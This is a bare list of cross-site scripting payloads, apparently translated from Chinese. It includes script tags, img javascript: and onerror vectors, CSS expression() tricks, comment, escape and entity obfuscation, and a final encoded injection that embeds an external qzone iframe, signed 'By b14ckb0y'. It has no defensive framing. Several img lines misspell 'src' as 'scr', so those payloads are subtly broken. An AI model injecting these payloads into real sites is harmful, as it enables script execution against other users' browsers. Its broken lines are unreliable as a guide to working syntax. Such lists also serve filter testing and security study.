<script>alert("跨站")</script> (most common)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (???? marks whitespace made with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["